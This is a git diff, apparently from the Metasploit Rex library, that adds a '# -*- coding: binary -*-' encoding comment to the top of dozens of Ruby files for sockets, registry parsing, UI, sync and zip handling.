require 'rex/proto/tftp'
diff --git a/lib/rex/proto/tftp/server.rb b/lib/rex/proto/tftp/server.rb
index 20348992a5..89af4703cb 100644
--- a/lib/rex/proto/tftp/server.rb
+++ b/lib/rex/proto/tftp/server.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
# $Id$
require 'rex/socket'
require 'rex/proto/tftp'
diff --git a/lib/rex/proto/tftp/server.rb.ut.rb b/lib/rex/proto/tftp/server.rb.ut.rb
index 88fa952259..b767e0c2e4 100755
--- a/lib/rex/proto/tftp/server.rb.ut.rb
+++ b/lib/rex/proto/tftp/server.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# $Revision$
#
diff --git a/lib/rex/registry.rb b/lib/rex/registry.rb
index cc67f232f8..a154c7fd7f 100644
--- a/lib/rex/registry.rb
+++ b/lib/rex/registry.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/registry/hive'
require 'rex/registry/regf'
require 'rex/registry/nodekey'
diff --git a/lib/rex/registry/hive.rb b/lib/rex/registry/hive.rb
index 45e40d2aca..d64c9db3b1 100644
--- a/lib/rex/registry/hive.rb
+++ b/lib/rex/registry/hive.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require_relative "regf"
require_relative "nodekey"
diff --git a/lib/rex/registry/lfkey.rb b/lib/rex/registry/lfkey.rb
index ad7aa371d4..29916ad179 100644
--- a/lib/rex/registry/lfkey.rb
+++ b/lib/rex/registry/lfkey.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require_relative "nodekey"
module Rex
diff --git a/lib/rex/registry/nodekey.rb b/lib/rex/registry/nodekey.rb
index 31c7e6ac14..3ee70e9c59 100644
--- a/lib/rex/registry/nodekey.rb
+++ b/lib/rex/registry/nodekey.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require_relative "lfkey"
require_relative "valuelist"
diff --git a/lib/rex/registry/regf.rb b/lib/rex/registry/regf.rb
index bfb719d95a..1b81bcc39f 100644
--- a/lib/rex/registry/regf.rb
+++ b/lib/rex/registry/regf.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Registry
diff --git a/lib/rex/registry/valuekey.rb b/lib/rex/registry/valuekey.rb
index 7e7241cb98..c5178c89b0 100644
--- a/lib/rex/registry/valuekey.rb
+++ b/lib/rex/registry/valuekey.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Registry
diff --git a/lib/rex/registry/valuelist.rb b/lib/rex/registry/valuelist.rb
index 5bb186fb56..bf5e51448d 100644
--- a/lib/rex/registry/valuelist.rb
+++ b/lib/rex/registry/valuelist.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require_relative "valuekey"
module Rex
diff --git a/lib/rex/ropbuilder.rb b/lib/rex/ropbuilder.rb
index 930c010de2..635119972c 100644
--- a/lib/rex/ropbuilder.rb
+++ b/lib/rex/ropbuilder.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module RopBuilder
diff --git a/lib/rex/ropbuilder/rop.rb b/lib/rex/ropbuilder/rop.rb
index 8169bacea7..aee2c11d26 100644
--- a/lib/rex/ropbuilder/rop.rb
+++ b/lib/rex/ropbuilder/rop.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'metasm'
require 'rex/compat'
require 'rex/ui/text/table'
diff --git a/lib/rex/script.rb b/lib/rex/script.rb
index 85210c3fe0..8dbb87b485 100644
--- a/lib/rex/script.rb
+++ b/lib/rex/script.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
module Rex
diff --git a/lib/rex/script/base.rb b/lib/rex/script/base.rb
index d6f0fbfe67..2982817d78 100644
--- a/lib/rex/script/base.rb
+++ b/lib/rex/script/base.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Script
class Base
diff --git a/lib/rex/script/meterpreter.rb b/lib/rex/script/meterpreter.rb
index 855658260b..7017a72a22 100644
--- a/lib/rex/script/meterpreter.rb
+++ b/lib/rex/script/meterpreter.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Script
diff --git a/lib/rex/script/shell.rb b/lib/rex/script/shell.rb
index 431ed0304d..043a7bec5a 100644
--- a/lib/rex/script/shell.rb
+++ b/lib/rex/script/shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Script
diff --git a/lib/rex/service.rb b/lib/rex/service.rb
index 23f2dd0160..85a357adcb 100644
--- a/lib/rex/service.rb
+++ b/lib/rex/service.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex'
require 'rex/proto'
diff --git a/lib/rex/service_manager.rb b/lib/rex/service_manager.rb
index be31278ccb..95be371699 100644
--- a/lib/rex/service_manager.rb
+++ b/lib/rex/service_manager.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'singleton'
require 'rex'
require 'rex/service'
diff --git a/lib/rex/service_manager.rb.ut.rb b/lib/rex/service_manager.rb.ut.rb
index 605eee60b4..0386f0692c 100644
--- a/lib/rex/service_manager.rb.ut.rb
+++ b/lib/rex/service_manager.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..'))
diff --git a/lib/rex/services/local_relay.rb b/lib/rex/services/local_relay.rb
index 09ec8b2ccc..5dab16b6fc 100644
--- a/lib/rex/services/local_relay.rb
+++ b/lib/rex/services/local_relay.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'thread'
require 'rex/socket'
diff --git a/lib/rex/socket.rb b/lib/rex/socket.rb
index d4c81ae914..9374349c6e 100644
--- a/lib/rex/socket.rb
+++ b/lib/rex/socket.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'socket'
require 'thread'
require 'resolv'
diff --git a/lib/rex/socket.rb.ut.rb b/lib/rex/socket.rb.ut.rb
index f0536d1288..25bcefa801 100644
--- a/lib/rex/socket.rb.ut.rb
+++ b/lib/rex/socket.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..'))
diff --git a/lib/rex/socket/comm.rb b/lib/rex/socket/comm.rb
index efc86c7f5c..c2ed353517 100644
--- a/lib/rex/socket/comm.rb
+++ b/lib/rex/socket/comm.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
module Rex
diff --git a/lib/rex/socket/comm/local.rb b/lib/rex/socket/comm/local.rb
index 6d61257efc..bd9be1ce04 100644
--- a/lib/rex/socket/comm/local.rb
+++ b/lib/rex/socket/comm/local.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'singleton'
require 'rex/socket'
require 'rex/socket/tcp'
diff --git a/lib/rex/socket/comm/local.rb.ut.rb b/lib/rex/socket/comm/local.rb.ut.rb
index 92612e805f..760152f59e 100644
--- a/lib/rex/socket/comm/local.rb.ut.rb
+++ b/lib/rex/socket/comm/local.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/socket/ip.rb b/lib/rex/socket/ip.rb
index 57948331a7..77994e92e7 100644
--- a/lib/rex/socket/ip.rb
+++ b/lib/rex/socket/ip.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
###
diff --git a/lib/rex/socket/parameters.rb b/lib/rex/socket/parameters.rb
index 4b41483d41..e4834b6ef8 100644
--- a/lib/rex/socket/parameters.rb
+++ b/lib/rex/socket/parameters.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
###
diff --git a/lib/rex/socket/parameters.rb.ut.rb b/lib/rex/socket/parameters.rb.ut.rb
index 59f50c518d..2ab504e3c9 100644
--- a/lib/rex/socket/parameters.rb.ut.rb
+++ b/lib/rex/socket/parameters.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/range_walker.rb b/lib/rex/socket/range_walker.rb
index 6d82c80a6a..f8c57e95fc 100644
--- a/lib/rex/socket/range_walker.rb
+++ b/lib/rex/socket/range_walker.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
module Rex
diff --git a/lib/rex/socket/range_walker.rb.ut.rb b/lib/rex/socket/range_walker.rb.ut.rb
index a73f20964d..c2aa6914a3 100644
--- a/lib/rex/socket/range_walker.rb.ut.rb
+++ b/lib/rex/socket/range_walker.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/ssl_tcp.rb b/lib/rex/socket/ssl_tcp.rb
index 949ad3e375..2620808c41 100644
--- a/lib/rex/socket/ssl_tcp.rb
+++ b/lib/rex/socket/ssl_tcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
###
diff --git a/lib/rex/socket/ssl_tcp.rb.ut.rb b/lib/rex/socket/ssl_tcp.rb.ut.rb
index d9aa9149af..8a6809d831 100644
--- a/lib/rex/socket/ssl_tcp.rb.ut.rb
+++ b/lib/rex/socket/ssl_tcp.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/ssl_tcp_server.rb b/lib/rex/socket/ssl_tcp_server.rb
index 20d96a8f26..d600b94cc9 100644
--- a/lib/rex/socket/ssl_tcp_server.rb
+++ b/lib/rex/socket/ssl_tcp_server.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'rex/socket/tcp_server'
require 'rex/io/stream_server'
diff --git a/lib/rex/socket/ssl_tcp_server.rb.ut.rb b/lib/rex/socket/ssl_tcp_server.rb.ut.rb
index 62c72c1e03..9b26dd8376 100644
--- a/lib/rex/socket/ssl_tcp_server.rb.ut.rb
+++ b/lib/rex/socket/ssl_tcp_server.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/subnet_walker.rb b/lib/rex/socket/subnet_walker.rb
index 11e8cccd3b..b781f08234 100644
--- a/lib/rex/socket/subnet_walker.rb
+++ b/lib/rex/socket/subnet_walker.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
module Rex
diff --git a/lib/rex/socket/subnet_walker.rb.ut.rb b/lib/rex/socket/subnet_walker.rb.ut.rb
index e8f61d7acc..a65f5c56a2 100644
--- a/lib/rex/socket/subnet_walker.rb.ut.rb
+++ b/lib/rex/socket/subnet_walker.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/switch_board.rb b/lib/rex/socket/switch_board.rb
index 5205bb57aa..ae9a29e182 100644
--- a/lib/rex/socket/switch_board.rb
+++ b/lib/rex/socket/switch_board.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'singleton'
require 'thread'
require 'rex/socket'
diff --git a/lib/rex/socket/switch_board.rb.ut.rb b/lib/rex/socket/switch_board.rb.ut.rb
index 1a797d6a65..4045beb7aa 100644
--- a/lib/rex/socket/switch_board.rb.ut.rb
+++ b/lib/rex/socket/switch_board.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/tcp.rb b/lib/rex/socket/tcp.rb
index 5967ffa1e8..8734dd8757 100644
--- a/lib/rex/socket/tcp.rb
+++ b/lib/rex/socket/tcp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'rex/io/stream'
diff --git a/lib/rex/socket/tcp.rb.ut.rb b/lib/rex/socket/tcp.rb.ut.rb
index e73403c129..8818c8f735 100644
--- a/lib/rex/socket/tcp.rb.ut.rb
+++ b/lib/rex/socket/tcp.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/tcp_server.rb b/lib/rex/socket/tcp_server.rb
index 7080b44dd3..8f2fbed22d 100644
--- a/lib/rex/socket/tcp_server.rb
+++ b/lib/rex/socket/tcp_server.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
require 'rex/socket/tcp'
require 'rex/io/stream_server'
diff --git a/lib/rex/socket/tcp_server.rb.ut.rb b/lib/rex/socket/tcp_server.rb.ut.rb
index 32280dde0f..6acafd9186 100644
--- a/lib/rex/socket/tcp_server.rb.ut.rb
+++ b/lib/rex/socket/tcp_server.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/socket/udp.rb b/lib/rex/socket/udp.rb
index 8e29cf672d..7df7201300 100644
--- a/lib/rex/socket/udp.rb
+++ b/lib/rex/socket/udp.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/socket'
###
diff --git a/lib/rex/socket/udp.rb.ut.rb b/lib/rex/socket/udp.rb.ut.rb
index 2046fabac7..b72c37b048 100644
--- a/lib/rex/socket/udp.rb.ut.rb
+++ b/lib/rex/socket/udp.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..'))
diff --git a/lib/rex/struct2.rb b/lib/rex/struct2.rb
index cfc1c1ba88..957e54d7e5 100644
--- a/lib/rex/struct2.rb
+++ b/lib/rex/struct2.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# just a shim to load all of the Struct2 libraries
diff --git a/lib/rex/struct2/c_struct.rb b/lib/rex/struct2/c_struct.rb
index d39367eb06..444b992aa0 100644
--- a/lib/rex/struct2/c_struct.rb
+++ b/lib/rex/struct2/c_struct.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/struct2/c_struct_template.rb b/lib/rex/struct2/c_struct_template.rb
index 9a814f476b..99c51840e5 100644
--- a/lib/rex/struct2/c_struct_template.rb
+++ b/lib/rex/struct2/c_struct_template.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/struct2/constant.rb b/lib/rex/struct2/constant.rb
index b47a5521a2..2dfdc7ec9a 100644
--- a/lib/rex/struct2/constant.rb
+++ b/lib/rex/struct2/constant.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/struct2/element.rb b/lib/rex/struct2/element.rb
index 216cdae739..4909295952 100644
--- a/lib/rex/struct2/element.rb
+++ b/lib/rex/struct2/element.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/struct2/generic.rb b/lib/rex/struct2/generic.rb
index befe6b323f..217f30e5af 100644
--- a/lib/rex/struct2/generic.rb
+++ b/lib/rex/struct2/generic.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/struct2/restraint.rb b/lib/rex/struct2/restraint.rb
index 9826163ee7..e00b124ddb 100644
--- a/lib/rex/struct2/restraint.rb
+++ b/lib/rex/struct2/restraint.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/struct2/s_string.rb b/lib/rex/struct2/s_string.rb
index 74493f07db..92e8b7605c 100644
--- a/lib/rex/struct2/s_string.rb
+++ b/lib/rex/struct2/s_string.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/struct2/s_struct.rb b/lib/rex/struct2/s_struct.rb
index 2051cd5155..0a367c9823 100644
--- a/lib/rex/struct2/s_struct.rb
+++ b/lib/rex/struct2/s_struct.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
# Rex::Struct2
module Rex
diff --git a/lib/rex/sync.rb b/lib/rex/sync.rb
index c64f505cda..75a130721b 100644
--- a/lib/rex/sync.rb
+++ b/lib/rex/sync.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
require 'rex/sync/thread_safe'
require 'rex/sync/ref'
diff --git a/lib/rex/sync/event.rb b/lib/rex/sync/event.rb
index f71c011cf5..eb3d1cd9bb 100644
--- a/lib/rex/sync/event.rb
+++ b/lib/rex/sync/event.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'thread'
module Rex
diff --git a/lib/rex/sync/read_write_lock.rb b/lib/rex/sync/read_write_lock.rb
index f038d24445..edb7588397 100644
--- a/lib/rex/sync/read_write_lock.rb
+++ b/lib/rex/sync/read_write_lock.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'thread'
module Rex
diff --git a/lib/rex/sync/ref.rb b/lib/rex/sync/ref.rb
index 1af98ab5e5..f768f257ef 100644
--- a/lib/rex/sync/ref.rb
+++ b/lib/rex/sync/ref.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'thread'
module Rex
diff --git a/lib/rex/sync/thread_safe.rb b/lib/rex/sync/thread_safe.rb
index e766d5da2d..120b23cdf2 100644
--- a/lib/rex/sync/thread_safe.rb
+++ b/lib/rex/sync/thread_safe.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'timeout'
module Rex
diff --git a/lib/rex/test.rb b/lib/rex/test.rb
index 072b9383ee..380e85817d 100644
--- a/lib/rex/test.rb
+++ b/lib/rex/test.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'test/unit'
# DEFAULTS
diff --git a/lib/rex/text.rb b/lib/rex/text.rb
index bb71747686..1ce4943202 100644
--- a/lib/rex/text.rb
+++ b/lib/rex/text.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'digest/md5'
require 'stringio'
diff --git a/lib/rex/text.rb.ut.rb b/lib/rex/text.rb.ut.rb
index 7c14bbb84f..d9c5520c3c 100644
--- a/lib/rex/text.rb.ut.rb
+++ b/lib/rex/text.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..'))
diff --git a/lib/rex/thread_factory.rb b/lib/rex/thread_factory.rb
index 704312db28..a373af490f 100644
--- a/lib/rex/thread_factory.rb
+++ b/lib/rex/thread_factory.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
###
diff --git a/lib/rex/time.rb b/lib/rex/time.rb
index 5735e82137..acfa6a19e5 100644
--- a/lib/rex/time.rb
+++ b/lib/rex/time.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
###
diff --git a/lib/rex/transformer.rb b/lib/rex/transformer.rb
index fa97a525e9..1454182e89 100644
--- a/lib/rex/transformer.rb
+++ b/lib/rex/transformer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
###
diff --git a/lib/rex/transformer.rb.ut.rb b/lib/rex/transformer.rb.ut.rb
index 151eed9ed7..26db466610 100644
--- a/lib/rex/transformer.rb.ut.rb
+++ b/lib/rex/transformer.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..'))
diff --git a/lib/rex/ui.rb b/lib/rex/ui.rb
index 4422e11018..a45e8c6f4b 100644
--- a/lib/rex/ui.rb
+++ b/lib/rex/ui.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
#
# This file includes everything needed to interact with the user interface
# wrappers of the rex library.
diff --git a/lib/rex/ui/interactive.rb b/lib/rex/ui/interactive.rb
index f3f9bf9978..55af6023ac 100644
--- a/lib/rex/ui/interactive.rb
+++ b/lib/rex/ui/interactive.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Ui
diff --git a/lib/rex/ui/output.rb b/lib/rex/ui/output.rb
index b2a0cf18f9..220ec68831 100644
--- a/lib/rex/ui/output.rb
+++ b/lib/rex/ui/output.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/output/none.rb b/lib/rex/ui/output/none.rb
index 14bb7a55bf..c9eafd2a96 100644
--- a/lib/rex/ui/output/none.rb
+++ b/lib/rex/ui/output/none.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/progress_tracker.rb b/lib/rex/ui/progress_tracker.rb
index 9b1d886b25..7b5992f618 100644
--- a/lib/rex/ui/progress_tracker.rb
+++ b/lib/rex/ui/progress_tracker.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Ui
diff --git a/lib/rex/ui/subscriber.rb b/lib/rex/ui/subscriber.rb
index baa89d8c60..542da35181 100644
--- a/lib/rex/ui/subscriber.rb
+++ b/lib/rex/ui/subscriber.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Ui
diff --git a/lib/rex/ui/text/color.rb b/lib/rex/ui/text/color.rb
index 9298c60095..5a8b25b90f 100644
--- a/lib/rex/ui/text/color.rb
+++ b/lib/rex/ui/text/color.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Ui
module Text
diff --git a/lib/rex/ui/text/color.rb.ut.rb b/lib/rex/ui/text/color.rb.ut.rb
index 5bb9bcb942..c20de93a24 100644
--- a/lib/rex/ui/text/color.rb.ut.rb
+++ b/lib/rex/ui/text/color.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/ui/text/dispatcher_shell.rb b/lib/rex/ui/text/dispatcher_shell.rb
index 7095853a0c..2dd3f904e2 100644
--- a/lib/rex/ui/text/dispatcher_shell.rb
+++ b/lib/rex/ui/text/dispatcher_shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
require 'pp'
diff --git a/lib/rex/ui/text/input.rb b/lib/rex/ui/text/input.rb
index 8dfac2f065..511e36431d 100644
--- a/lib/rex/ui/text/input.rb
+++ b/lib/rex/ui/text/input.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/input/buffer.rb b/lib/rex/ui/text/input/buffer.rb
index 93d4e44e75..9f22c24eb0 100644
--- a/lib/rex/ui/text/input/buffer.rb
+++ b/lib/rex/ui/text/input/buffer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/input/readline.rb b/lib/rex/ui/text/input/readline.rb
index 4a0105acd2..50a2bd4867 100644
--- a/lib/rex/ui/text/input/readline.rb
+++ b/lib/rex/ui/text/input/readline.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/input/socket.rb b/lib/rex/ui/text/input/socket.rb
index 60b3a7b901..82e8469b5e 100644
--- a/lib/rex/ui/text/input/socket.rb
+++ b/lib/rex/ui/text/input/socket.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/input/stdio.rb b/lib/rex/ui/text/input/stdio.rb
index 42c8ca9c3a..ddc3de1810 100644
--- a/lib/rex/ui/text/input/stdio.rb
+++ b/lib/rex/ui/text/input/stdio.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/irb_shell.rb b/lib/rex/ui/text/irb_shell.rb
index a3f63ac8b5..10cd345a65 100644
--- a/lib/rex/ui/text/irb_shell.rb
+++ b/lib/rex/ui/text/irb_shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
module Rex
module Ui
module Text
diff --git a/lib/rex/ui/text/output.rb b/lib/rex/ui/text/output.rb
index 5f3c72c1ae..eb4704cdee 100644
--- a/lib/rex/ui/text/output.rb
+++ b/lib/rex/ui/text/output.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/output/buffer.rb b/lib/rex/ui/text/output/buffer.rb
index 3d1c04ddda..1252f17a0b 100644
--- a/lib/rex/ui/text/output/buffer.rb
+++ b/lib/rex/ui/text/output/buffer.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/output/file.rb b/lib/rex/ui/text/output/file.rb
index f0a78a7172..867969729f 100644
--- a/lib/rex/ui/text/output/file.rb
+++ b/lib/rex/ui/text/output/file.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/output/socket.rb b/lib/rex/ui/text/output/socket.rb
index dea815a871..b43ea08691 100644
--- a/lib/rex/ui/text/output/socket.rb
+++ b/lib/rex/ui/text/output/socket.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/output/stdio.rb b/lib/rex/ui/text/output/stdio.rb
index 581201b2a3..68494caac9 100644
--- a/lib/rex/ui/text/output/stdio.rb
+++ b/lib/rex/ui/text/output/stdio.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
begin
diff --git a/lib/rex/ui/text/output/tee.rb b/lib/rex/ui/text/output/tee.rb
index be6440a5aa..70f825716b 100644
--- a/lib/rex/ui/text/output/tee.rb
+++ b/lib/rex/ui/text/output/tee.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/progress_tracker.rb b/lib/rex/ui/text/progress_tracker.rb
index bc861754ed..c5520d2493 100644
--- a/lib/rex/ui/text/progress_tracker.rb
+++ b/lib/rex/ui/text/progress_tracker.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui/progress_tracker'
module Rex
diff --git a/lib/rex/ui/text/progress_tracker.rb.ut.rb b/lib/rex/ui/text/progress_tracker.rb.ut.rb
index 8ac7109a9c..bef742aac2 100644
--- a/lib/rex/ui/text/progress_tracker.rb.ut.rb
+++ b/lib/rex/ui/text/progress_tracker.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/ui/text/shell.rb b/lib/rex/ui/text/shell.rb
index 7628eed926..840fc3cd09 100644
--- a/lib/rex/ui/text/shell.rb
+++ b/lib/rex/ui/text/shell.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
module Rex
diff --git a/lib/rex/ui/text/table.rb b/lib/rex/ui/text/table.rb
index e1e7d97c5a..0c548a30ea 100644
--- a/lib/rex/ui/text/table.rb
+++ b/lib/rex/ui/text/table.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
require 'rex/ui'
require 'rex/socket'
diff --git a/lib/rex/ui/text/table.rb.ut.rb b/lib/rex/ui/text/table.rb.ut.rb
index e36f5627c2..00b63208d1 100644
--- a/lib/rex/ui/text/table.rb.ut.rb
+++ b/lib/rex/ui/text/table.rb.ut.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
$:.unshift(File.join(File.dirname(__FILE__), '..', '..', '..'))
diff --git a/lib/rex/zip.rb b/lib/rex/zip.rb
index 890837f19b..495aed8cd7 100644
--- a/lib/rex/zip.rb
+++ b/lib/rex/zip.rb
@@ -1,4 +1,5 @@
#!/usr/bin/env ruby
+# -*- coding: binary -*-
#
# Zip library
#
diff --git a/lib/rex/zip/archive.rb b/lib/rex/zip/archive.rb
index 34053b5e5e..0c69769aee 100644
--- a/lib/rex/zip/archive.rb
+++ b/lib/rex/zip/archive.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/rex/zip/blocks.rb b/lib/rex/zip/blocks.rb
index a8c5a8bc22..6774e73869 100644
--- a/lib/rex/zip/blocks.rb
+++ b/lib/rex/zip/blocks.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
diff --git a/lib/rex/zip/entry.rb b/lib/rex/zip/entry.rb
index 0bcfc8f6d5..8248126dcd 100644
--- a/lib/rex/zip/entry.rb
+++ b/lib/rex/zip/entry.rb
@@ -1,3 +1,4 @@
+# -*- coding: binary -*-
##
# $Id$
##
